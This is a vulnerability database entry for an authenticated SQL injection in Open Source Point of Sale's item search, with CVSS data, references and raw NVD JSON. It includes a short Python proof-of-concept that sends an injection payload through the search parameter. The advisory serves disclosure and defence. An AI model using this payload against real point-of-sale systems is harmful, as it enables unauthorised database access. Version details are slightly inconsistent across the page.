CVE-2026-32888

Description

Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Versions contain an SQL Injection in the Items search functionality. When the custom attribute search feature is enabled (search_custom filter), user-supplied input from the search GET parameter is interpolated directly into a HAVING clause without parameterization or sanitization. This allows an authenticated attacker with basic item search permissions to execute arbitrary SQL queries. A patch did not exist at the time of publication.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:* - VULNERABLE

未指定具体版本（发布时受影响版本均存在该漏洞）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-ospos/index.php/items"

# Attacker requires a valid low-privilege session cookie
session_cookies = {
    "ci_session": "attacker_session_id_here"
}

# Malicious payload designed for HAVING clause injection
# This payload attempts to perform a boolean-based blind injection
sql_payload = "1' AND 1=1-- -"

parameters = {
    "search_custom": "1",  # This filter must be enabled to trigger the vulnerability
    "search": sql_payload
}

response = requests.get(target_url, params=parameters, cookies=session_cookies)

if response.status_code == 200:
    print("Payload sent successfully. Check response for timing or content differences.")
else:
    print("Request failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32888
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32888
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32888/
[4] VulDB https://vuldb.com/cve/CVE-2026-32888
[5] https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hmjv-wm3j-pfhw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32888", "sourceIdentifier": "[email protected]", "published": "2026-03-20T03:15:59.707", "lastModified": "2026-04-08T20:54:00.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Versions contain an SQL Injection in the Items search functionality. When the custom attribute search feature is enabled (search_custom filter), user-supplied input from the search GET parameter is interpolated directly into a HAVING clause without parameterization or sanitization. This allows an authenticated attacker with basic item search permissions to execute arbitrary SQL queries. A patch did not exist at the time of publication."}, {"lang": "es", "value": "Open Source Point de Sale es una aplicación de punto de venta basada en web escrita en PHP utilizando el framework CodeIgniter. Las versiones contienen una inyección SQL en la funcionalidad de búsqueda de Artículos. Cuando la función de búsqueda de atributos personalizados está habilitada (filtro search_custom), la entrada proporcionada por el usuario desde el parámetro GET de búsqueda se interpola directamente en una cláusula HAVING sin parametrización ni saneamiento. Esto permite a un atacante autenticado con permisos básicos de búsqueda de artículos ejecutar consultas SQL arbitrarias. No existía un parche en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.4.2", "matchCriteriaId": "A212E29B-410C-462B-AA6F-CF02175A6913"}]}]}], "references": [{"url": "https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hmjv-wm3j-pfhw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Patch"]}]}}